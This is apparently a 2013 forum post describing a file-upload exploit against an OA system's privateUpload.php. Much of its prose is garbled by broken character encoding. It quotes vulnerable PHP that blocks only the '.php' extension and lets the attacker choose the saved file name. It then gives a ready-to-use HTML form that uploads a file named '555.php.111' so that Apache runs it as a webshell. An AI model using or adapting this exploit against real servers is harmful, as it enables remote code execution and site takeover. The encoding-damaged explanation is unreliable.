admin 2013-4-16 16:46:29

ͨOA getshell©EXP

ߣ@SafeKey Team



general/vmeet/ µ privateUpload.phpļ
ǿ



include_once( "inc/conn.php" ); //conn.phpļ include_once( "inc/utility_file.php" );//utility_file.phpļ ob_end_clean( );// $uploadFileName = $_FILES['Filedata']['name'];//ȡϴļ $uploadFile = $_FILES['Filedata']['tmp_name'];   //ȡϴʱļַ $uploadFileName = iconv( "UTF-8", $MYOA_CHARSET, $uploadFileName );//תļ룬ͳһutf-8 if ( is_uploaded_file( $uploadFile ) )//жǷѾϴļʱļִ {         $pos = strrpos( $uploadFileName, "." ); //ȡļһλ         $len = strlen( $uploadFileName ); //ȡļ         $extendType = substr( $uploadFileName, $pos, $len );//ȡļ         if ( strtolower( $extendType ) == ".php" )//жϺ׺ǷΪ.php.phpִУִ         {               echo "upload file fobidden";               exit( );         }         $localFileName = $_GET['fileName']; //getʽȡļ ©         $ZLCHAT_ATTACH = "upload/"; //ϴĿ¼         $localFile = "{$ZLCHAT_ATTACH}/temp/".$localFileName; //ϴλã$localFileNameǿɿصı         if ( !td_move_uploaded_file( $uploadFile, $localFile ) ) //ϴ         {               echo "upload failed";         } } ?>
Ƕһôƹwebshellأ
DZס.ϵͳõapacheapacheһ© ļ1.php.222 ļΪphp
©ƹļ׺ġ

ֻҪϴphp׺ļȻԶһ׺Ϊ1.php.111ˡ ϴĿ¼ָˣǾɻȡһwebshell
ұزԵĽ

Ҹһexp
ĴΪ1.html ҪԵĻֻҪ192.168.56.139ijĿվ
exp





<form id=frmUpload enctype=multipart/form-data action=http://192.168.56.139/general/vmeet/privateUpload.php?fileName=555.php.111 method=post>Upload a new file:<br> <input type=file name=Filedata size=50><br> <input type=submit value=Upload> <!Chttp://192.168.56.139/general/vmeet/upload/temp/555.php.111    ϴ֮C> </form>
ҳ: [1]
鿴汾: ͨOA getshell©EXP